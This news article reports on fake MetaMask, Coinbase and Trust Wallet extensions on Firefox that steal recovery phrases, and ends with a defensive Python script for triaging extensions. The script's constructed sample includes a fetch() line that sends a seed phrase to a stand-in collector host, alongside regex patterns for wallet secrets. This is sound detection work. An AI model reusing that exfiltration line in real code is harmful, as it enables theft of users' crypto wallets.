More than forty fraudulent extensions imitating popular cryptocurrency wallet apps such as Coinbase, MetaMask, and Trust Wallet are currently available on Mozilla’s Firefox extension store. According to a report by Koi Security dated July 2, 2025, these imitation extensions pose a significant threat by secretly collecting users’ wallet credentials. The campaign has been active since April and is still evolving, with new extensions added as recently as last week. Numerous fake five-star reviews have deceptively enhanced the extensions’ credibility among users.
How Do Fake Extensions Operate?
These counterfeit extensions use the logos and descriptions of well-known crypto wallet services to create a façade of authenticity. By leveraging popular keywords, they swiftly gain prominence in search results and increase their download rates. Once an extension is installed, its interface seems legitimate, but hidden scripts extract private keys and recovery phrases and transmit them to malicious servers, which poses a significant risk to users.
Are Russian Connections Involved?
Security researchers have identified Russian-language comments embedded within PDF files and notes in the extensions’ source code, suggesting a potential Russian-speaking threat actor. While conclusive evidence remains elusive, geographic details such as timestamps and file paths support the likelihood of this theory. Researchers remain cautious, acknowledging that more proof is needed to confirm these findings.
Since the observed onset in April, over 60 variations have surfaced, with the latest release happening just last week. To bypass detection, these extensions consistently update and rebrand, continuing their presence in the store. Some undetected copies still linger, prompting Koi Security to advise users to upgrade extensions only through verified site links.
The following concrete measures need consideration:
- Regular checks and audits of extension stores to identify and remove malicious extensions.
- Educating users on verifying extension authenticity before installation.
- Implementing enhanced scanning processes to detect hidden malicious scripts.
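As an illustration of the scanning measure above, here is an added example (not code from Koi Security or Mozilla) of a static triage pass over an unpacked extension. It flags a wallet brand name used under an ID that is not allowlisted, and scripts that combine wallet-secret terms with a network call to an unexpected host. The function name `triage`, the allowlisted IDs and hosts, and the sample input are constructed placeholders; plain string matching like this will miss obfuscated code.

```python
import re
from urllib.parse import urlparse

# Brands named in the article. The IDs and hosts are constructed placeholders,
# not the real identifiers of any official extension.
OFFICIAL = {
    "metamask": {"ids": {"official-metamask@example.invalid"}, "hosts": {"api.metamask.example"}},
    "coinbase": {"ids": {"official-coinbase@example.invalid"}, "hosts": {"api.coinbase.example"}},
    "trust wallet": {"ids": {"official-trust@example.invalid"}, "hosts": {"api.trust.example"}},
}
SECRET_RE = re.compile(r"mnemonic|seed[\s_-]?phrase|recovery[\s_-]?phrase|private[\s_-]?key", re.I)
SINK_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+WebSocket\s*\(")
URL_RE = re.compile(r"""["'`]((?:https?|wss?)://[^"'`\s]+)""")

def triage(manifest, scripts):
    """Return (rule, detail) findings for one unpacked extension."""
    findings = []
    name = manifest.get("name", "").lower()
    # Firefox add-on ID as declared in manifest.json
    ext_id = manifest.get("browser_specific_settings", {}).get("gecko", {}).get("id")
    brand = next((b for b in OFFICIAL if b in name), None)
    allowed_hosts = OFFICIAL[brand]["hosts"] if brand else set()
    if brand and ext_id not in OFFICIAL[brand]["ids"]:
        findings.append(("brand-impersonation", f"{brand!r} in name, id {ext_id!r} not allowlisted"))
    for path, source in scripts.items():
        # Hosts found in URL literals, minus those expected for the claimed brand
        hosts = {urlparse(u).hostname for u in URL_RE.findall(source)} - allowed_hosts - {None}
        if SECRET_RE.search(source) and SINK_RE.search(source) and hosts:
            findings.append(("secret-to-network", f"{path}: secret terms + network call to {sorted(hosts)}"))
    return findings

# Constructed sample input (not taken from any real extension).
SAMPLE_MANIFEST = {
    "name": "MetaMask Wallet Pro",
    "browser_specific_settings": {"gecko": {"id": "lookalike@example.invalid"}},
}
SAMPLE_SCRIPTS = {
    "ui.js": "document.title = 'Wallet';",
    "bg.js": "const seedPhrase = input.value;\n"
             "fetch('https://collector.example/c', {method: 'POST', body: seedPhrase});",
}

if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS):
        print(rule, "-", detail)
```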
Mozilla’s Firefox extension store remains a target for bad actors exploiting security gaps through deceptive practices. As these threats evolve and continue to endanger users, vigilance and heightened awareness of extension authenticity are crucial for safeguarding digital assets.